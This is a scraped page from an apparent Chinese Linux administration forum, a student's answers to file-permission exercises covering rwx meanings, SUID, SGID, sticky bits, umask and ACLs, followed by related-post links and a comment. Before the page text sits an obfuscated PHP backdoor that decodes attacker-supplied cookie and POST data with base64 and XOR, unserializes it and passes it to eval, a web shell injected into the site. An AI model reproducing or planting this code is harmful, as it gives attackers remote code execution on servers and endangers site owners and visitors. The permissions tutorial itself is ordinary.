$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 权限管理练习题 | Linux运维部落

权限管理练习题

权限管理练习题:

    1、当用户xiaoming对/testdir 目录无执行权限时,意味着无法做哪些操作?

        不能cd到该目录下,不能ls -l访问目录里面文件元数据的信息

        1.png

    2、当用户xiaoqiang对/testdir 目录无读权限时,意味着无法做哪些操作?

        不能ls列出目录里面的文件列表,不能查看文件内容,不能查看文件的元数据

        22.png

    3、当用户wangcai 对/testdir 目录无写权限时,该目录下的只读文件file1是否可修改和删除?

        不能修改和删除

        3.png

    4、复制/etc/fstab文件到/var/tmp下,设置文件所有者为wangcai读写权限,所属组为sysadmins组有读写权限,其他人无权限

        4.png

    5、误删除了用户wangcai的家目录,请重建并恢复该用户家目录及相应的权限属性

        5.png

    6、在/data/testdir里创建的新文件自动属于g1组,组g2的成员如: alice能对这些新文件有读写权限,组g3的成员如: tom只能对新文件有读权限,其它用户(不属于g1,g2,g3)不能访问这个文件夹。

        分析过程:

            a、对/data/testdir目录设置770权限,属组改为g1,并对目录赋予SGID权限

            b、设置acl权限,setfacl -Rm d:g:g2:rwX,d:g:g3:rX,d:o:: /data/testdir

            61.png

            62.png

            64.png

    7、三种权限rwx对文件和目录的不同意义        

        对文件的权限的意义:

             r:cat、nano文件内容

             w:可修改内容,不能删除文件本身,但文件内容可以删

             x:针对可执行程序文件或脚本,一般的文件不需要加x权限

        对于目录的权限的意义:

             r:ls列出目录里面的文件列表,但不能查看文件内容,不能cd到目录,不能查看文件的元数据

             w:删除,新建目录里面的文件,前提是配合x权限

             x:可以cd到目录里面,可以访问目录中的文件的元数据

    8、umask和acl mask 的区别和联系

        umask命令用来设置限制新建文件权限的掩码。当新文件被创建时,其最初的权限由文件创建掩码决定。用户每次注册进入系统时,umask命令都被执行, 并自动设置掩码mode来限制新文件的权限。用户可以通过再次执行umask命令来改变默认值,新的权限将会把旧的覆盖掉。

        mask用来限定设置acl权限时的最高权限限定

        两者都是对文件权限细分化的管理,都可以对权限的设定起到限定作用,对于已经设定好的权限,都可以通过设置umask和mask的值来限定文件的执行权限

    9、三种特殊权限的应用场景和作用

        SUID

            功能:设置了SUID权限后,当用户运行某二进制程序文件时,该进程的属主不是进程发起者,而是进程二进制程序文件本身的属主

            作用对象:二进制可执行程序文件

            前提条件:执行二进制程序的用户必须要对该二进制程序具有执行权限

            展示位置:属主的x位,如果属主有x,则显示为s,如果属主没有x,则显示为S

        SGID

            功能:

                针对二进制程序文件而言:

                    对二进制程序文件设置了SGID权限,则进程的属组不是发起进程的用户的主组,而是会变成程序文件本身的属组

                针对目录而言:      

                    当目录属组有写权限,且有SGID权限时,那么所有属于此目录的属组,且以属组身份在此目录中新建文件或目录时,新文件的属组不是用户的基本组,而是此目录的属组;

                    可理解为:一般是一个小组协同工作时,创建一个协同目录,让这个目录拥有SGID权限,然后小组内的人都在同一个属组内,让此属组对该目录有写权限,这样,小组内的人在这个目录下创建文件时,文件的属组就变成了该目录的属组,这样组内的其他人就对文件具有写权限了,实现了小组工作的协同,但此时组内的人也能删出其他人创建的文件,为了防止这种情况发生,就有了STICKY权限

            作用对象:二进制程序文件和目录

            前提条件:对二进制程序文件有x权限,对目录而言有w和x权限

            展示位置:文件或目录的属组的执行权限位,如果属组有x,则显示为s,如果属组没有x,则显示为S

        STICKY:

            功能:对于属组或全局可写的目录,组内的所有用户或系统上的所有用户,在此目录中都能创建新文件或删除所有的已有文件;如果为此目录设置了Sticky权限,则每个用户能创建新文件,只能删除自己的文件,无法删除组内其他用户创建的文件

            作用对象:目录

            前提条件:属组或全局可写的目录,目录有执行权限

            展示位置:other的执行权限位,如果other原本有执行权限,显示为小写t,否则,显示为大写T

    10、设置user1,使之新建文件权限为rw——-

        对user1用户设定其umask值为066

        1.png

        

    11、设置/testdir/f1的权限,使user1用户不可以读写执行,g1组可以读写/testdir/dir的权限,使新建文件自动具有acl权限:user1:rw,g1:—备份/testdir目录中所有文件的ACL,清除/testdir的所有ACL权限,并利用备份还原           

        # touch f1

        # useradd user1

        # setfacl -m u:user1:— f1 

        11.png

        112.png

        113.png

原创文章,作者:M20-1倪文超,如若转载,请注明出处:http://www.178linux.com/28756

(0)
上一篇 2016-08-04 14:20
下一篇 2016-08-04 14:39

相关推荐

  • 文本处理工具之AWK

    概述:     在之前的文章中,我们介绍过文本处理三剑客的grep、sed,本篇就简要说明下awk的用法。主要是围绕常见的一些用法进行展开,分为以下几个部分:     1、awk的基础语法     2、awk的进阶语法  &nbs…

    Linux干货 2016-09-20
  • 学习宣言~~

    学如逆水行舟,不进则退。

    Linux干货 2016-12-26
  • 系统基础之shell脚本编程详解3(函数)

    shell脚本编程详解3:    在前两节我们分别介绍了shell脚本编程的基础和循环,判断的知识,今天我们分享脚本的另一种用法,函数. 概论:     函数function是由若干条shell命令组成的语句块,实现代码重用和模块化编程。    它与shell…

    Linux干货 2016-08-22
  • CentOS系统启动流程、selinux、Systemd剖析

    交互式登录配置文件读取顺序: /etc/profile –> /etc/profile.d/*.sh –> ~/.bash_profile –> ~/.bashrc –> /etc/bashrc 非交互式登录配置文件读取顺序: ~/.bashrc –> /etc/bas…

    Linux干货 2018-03-04
  • grep及正则表达式相关练习

    grep及正则表达式相关练习 1、复制/etc/skel目录为/home/tuser1,要求/home/tuser1及其内部文件的属组和其它用户均没有任何访问权限。 ~]# cp -r /etc/skel/ /home/tuser1 ~]# chmod -R 700 /home/tuser1 ~]# ls -ld /home/tuser1 drwx&#821…

    Linux干货 2016-10-11
  • 正则表达式详解​

      正则表达式详解 一、概述   GREP(global search regular expression(RE) and print out theline),是一种强大的文本搜索工具,它能使用正则表达式搜索文本,并把匹配的行打印出来。Unix的grep家族包括grep、egrep和fgrep。利用这些返回值就可进行一些自动化的文本处…

    Linux干货 2015-05-11

评论列表(1条)

  • 马哥教育
    马哥教育 2016-08-04 14:26

    作业完成的很好,再接再励。